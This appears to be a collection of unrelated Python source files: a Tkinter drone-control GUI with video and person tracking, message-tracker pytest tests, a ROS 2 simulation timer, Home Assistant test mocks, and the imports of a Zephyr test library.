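            # Hedged sketch: the docstring above mentions centring Flydo's view on the bbox, but
            # only the overlay is produced here. One possible (illustrative, untested) way to close
            # the loop, assuming djitellopy's send_rc_control(lr, fb, ud, yaw) with -100..100 values:
            #
            #     frame_cx = self.current_img.shape[1] // 2
            #     bbox_cx = (bbox_coords[0] + bbox_coords[2]) // 2
            #     yaw = int(np.clip((bbox_cx - frame_cx) * 0.25, -100, 100))
            #     self.flydo.send_rc_control(0, 0, 0, yaw)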
def run_app(self):
# For background image
bg_dir = "C:\\Users\\charl\\Desktop\\flydo\\docs\\Tacit.jpg"
img = Image.open(bg_dir).resize((self.WIDTH, self.HEIGHT))
bg_label = Label(self.root)
bg_label.img = ImageTk.PhotoImage(img)
bg_label["image"] = bg_label.img
bg_label.place(x=0, y=0, relwidth=1, relheight=1)
# Takeoff/Land button
takeoff_button = Button(self.root, text="Takeoff/Land", font=("Verdana", 18), bg="#95dff3", command=lambda: self.takeoff_land())
tl_width = 200
tl_height = 100
takeoff_button.config(width=tl_width, height=tl_height)
takeoff_button.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.625, relwidth=tl_width/self.WIDTH, height=80)
# Fly upwards button
upward_button = Button(self.root, text=" /\ \n||", font=("Verdana", 18), bg="#95dff3")
upward_button.place(x=100, rely=0.65, width=80, height=80)
upward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "upward", self.flydo))
upward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly downwards button
downward_button = Button(self.root, text=" || \n\/", font=("Verdana", 18), bg="#95dff3")
downward_button.place(x=100, rely=0.85, width=80, height=80)
downward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "downward", self.flydo))
downward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly forwards button
forward_button = Button(self.root, text=" /\ \n||", font=("Verdana", 18), bg="#95dff3")
forward_button.place(x=self.WIDTH-180, rely=0.65, width=80, height=80)
forward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "forward", self.flydo))
forward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly backwards button
backward_button = Button(self.root, text=" || \n\/", font=("Verdana", 18), bg="#95dff3")
backward_button.place(x=self.WIDTH-180, rely=0.85, width=80, height=80)
backward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "backward", self.flydo))
backward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Yaw left button
yawleft_button = Button(self.root, text="<=", font=("Verdana", 18), bg="#95dff3")
yawleft_button.place(x=20, rely=(0.85+0.65)/2, width=80, height=80)
yawleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "yaw_left", self.flydo))
yawleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Yaw right button
yawright_button = Button(self.root, text="=>", font=("Verdana", 18), bg="#95dff3")
yawright_button.place(x=180, rely=(0.85+0.65)/2, width=80, height=80)
yawright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "yaw_right", self.flydo))
yawright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly left button
flyleft_button = Button(self.root, text="<=", font=("Verdana", 18), bg="#95dff3")
flyleft_button.place(x=self.WIDTH-260, rely=(0.85+0.65)/2, width=80, height=80)
flyleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "left", self.flydo))
flyleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly right button
flyright_button = Button(self.root, text="=>", font=("Verdana", 18), bg="#95dff3")
flyright_button.place(x=self.WIDTH-100, rely=(0.85+0.65)/2, width=80, height=80)
flyright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "right", self.flydo))
flyright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Flip left button
flipleft_button = Button(self.root, text="<<", font=("Verdana", 18), bg="#95dff3")
flipleft_button.place(x=100, rely=(0.85+0.65)/2, width=80, height=80)
flipleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "flip_left", self.flydo))
flipleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Flip right button
flipright_button = Button(self.root, text=">>", font=("Verdana", 18), bg="#95dff3")
flipright_button.place(x=self.WIDTH-180, rely=(0.85+0.65)/2, width=80, height=80)
flipright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "flip_right", self.flydo))
flipright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Take picture button
picture_button = Button(self.root, text="•", font=("Verdana", 18), bg="#95dff3", command=lambda: self.take_screenshot())
picture_button.place(x=280, rely=(0.85+0.65)/2, width=80, height=80)
# Take video button
video_button = Button(self.root, fg="red", text="•", font=("Verdana", 18), bg="#95dff3", command=lambda: self.take_video())
video_button.place(x=440, rely=(0.85+0.65)/2, width=80, height=80)
# Track person button
tracking_button = Button(self.root, text="⌐╦╦═─", font=("Verdana", 16), bg="#95dff3", command=lambda: self.track_person())
tracking_button.place(x=360, rely=(0.85+0.65)/2, width=80, height=80)
# For video stream
self.cap_label = Label(self.root)
self.cap_label.pack()
self.display_battery()
self.video_stream()
self.canvas.pack()
self.root.mainloop()
def display_battery(self):
'''Displays and updates current battery level.
Battery level is replaced with "Screenshotted" briefly when a screenshot is taken successfully.'''
if self.screenshot_taken:
battery = Label(text=f"Screenshotted", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(500, self.display_battery)
self.screenshot_taken = False
elif self.recording:
battery = Label(text=f"Recording", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(5, self.display_battery)
else:
battery = Label(text=f"Battery: {int(self.flydo_battery)}%", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(5, self.display_battery)
def video_stream(self):
h = 480
w = 720
frame = self.flydo.get_frame_read().frame
self.current_img = frame # For taking screenshots
if self.tracking and self.tracking_img is not None:
frame = cv2.resize(self.tracking_img, (w, h))
else:
frame = cv2.resize(frame, (w, h))
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(image=img)
self.cap_label.place(x=self.WIDTH/2 - w/2, y=0)
self.cap_label.imgtk = imgtk
self.cap_label.configure(image=imgtk)
self.cap_label.after(5, self.video_stream)
if __name__ == "__main__":
FlydoGUI = GUI(800, 800)
FlydoGUI.run_app()
|
test_tracking.py
|
import datetime
import logging
import multiprocessing
import pytest
import uuid
from c4.messaging import Envelope, MessageTracker, MessageTrackerDB
log = logging.getLogger(__name__)
@pytest.fixture(scope="function", params=[MessageTracker(), MessageTrackerDB()])
def tracker(request):
return request.param
def test_tracking(tracker):
a = Envelope("a", "b", "test")
aRelatedA = str(uuid.uuid4())
aRelatedB = str(uuid.uuid4())
b = Envelope("a", "b", "test")
bRelatedA = str(uuid.uuid4())
tracker.add(a)
tracker.addRelatedMessage(a.MessageID, aRelatedA)
tracker.addRelatedMessage(a.MessageID, aRelatedB)
tracker.add(b)
tracker.addRelatedMessage(b.MessageID, bRelatedA)
assert tracker.hasMoreRelatedMessages(a.MessageID)
assert tracker.hasMoreRelatedMessages(b.MessageID)
assert len(tracker.getRelatedMessageIds(a.MessageID)) == 2
tracker.removeRelatedMessage(aRelatedA)
tracker.removeRelatedMessage(aRelatedB)
assert tracker.hasMoreRelatedMessages(a.MessageID) == False
assert tracker.hasMoreRelatedMessages(b.MessageID)
assert len(tracker.getRelatedMessageIds(a.MessageID)) == 0
aCopy = tracker.remove(a.MessageID)
assert aCopy.Action == "test"
def test_sharedTracking(tracker):
numberOfProcesses = 10
ids = [str(uuid.uuid4()) for _ in range(numberOfProcesses)]
start = datetime.datetime.utcnow()
a = Envelope("a", "b", "test")
    def add(tracker, relatedId):
        tracker.addRelatedMessage(a.MessageID, relatedId)
processes = []
for number in ids:
process = multiprocessing.Process(target=add, args=([tracker, number]))
processes.append(process)
process.start()
for process in processes:
process.join()
end = datetime.datetime.utcnow()
assert len(tracker.getRelatedMessageIds(a.MessageID)) == numberOfProcesses
logging.debug("testing %s backend took %s", tracker.__class__, end-start)
def test_updating():
tracker = MessageTracker()
a = Envelope("a", "b", "test")
a.Message = {"same": 1,
"valueChange1": 1,
"valueChange2": {"test": "test"},
"valueChange3": {"test": {"test2": "test"}},
"onlyInOne": 1
}
tracker.add(a)
content = {"same": 1,
"valueChange1": 2,
"valueChange2": {"test": "newValue"},
"valueChange3": {"test": {"test2": "newValue"}},
"onlyInTwo1": 1,
"onlyInTwo2": {"test": "test"}
}
tracker.updateMessageContent(a.MessageID, content)
merged = tracker.messages[a.MessageID].Message
assert merged["same"] == 1
assert merged["onlyInOne"] == 1
assert merged["onlyInTwo1"] == 1
assert merged["onlyInTwo2"] == {"test": "test"}
assert merged["valueChange1"] == 2
assert merged["valueChange2"] == {"test": "newValue"}
assert merged["valueChange3"] == {"test": {"test2": "newValue"}}
|
set_simulation_timer.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rclpy
import rclpy.clock
import time
import threading
from plankton_utils.time import time_in_float_sec
from plankton_utils.time import is_sim_time
#==============================================================================
def main():
rclpy.init()
sim_time_param = is_sim_time()
node = rclpy.create_node('set_simulation_timer',
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
parameter_overrides=[sim_time_param])
timeout = 0.0
if node.has_parameter('timeout'):
timeout = node.get_parameter('timeout').get_parameter_value().double_value
if timeout <= 0:
raise RuntimeError('Termination time must be a positive floating point value (X.Y)')
node.get_logger().info('Starting simulation timer - Timeout = {} s'.format(timeout))
    # Note that the node's clock will be initialized from the /clock topic during the spin in sim time mode
# Behaviour of Rate changed in ROS 2. To wake it up, it needs to be triggered from a separate
# thread. Maybe a rclpy.spin_once + time.sleep() would be enough
FREQ = 100
rate = node.create_rate(FREQ)
thread = threading.Thread(target=rclpy.spin, args=(node,), daemon=True)
thread.start()
while time_in_float_sec(node.get_clock().now()) < timeout:
# Just a guard for really short timeouts
if 1.0 / FREQ < timeout:
rate.sleep()
node.get_logger().info('Simulation timeout - Killing simulation...')
# destroy_node() prevents a further warning on exit
node.destroy_node()
rclpy.shutdown()
thread.join()
#==============================================================================
if __name__ == '__main__':
try:
main()
except Exception as e:
print('Caught exception: ' + str(e))
print('Exiting')
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count; optional, as it can usually be
      determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
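# Illustrative usage sketch (not part of the original helpers), assuming the usual
# homeassistant.helpers.storage.Store API; the storage key and payload below are
# hypothetical.
#
#     with mock_storage({'test.key': {'version': 1, 'data': {'foo': 'bar'}}}) as stored:
#         ...  # exercise code that loads/saves the 'test.key' store
#         # loads return the seeded payload; after a save, stored['test.key'] holds
#         # the JSON-roundtripped data that the code under test wrote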
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
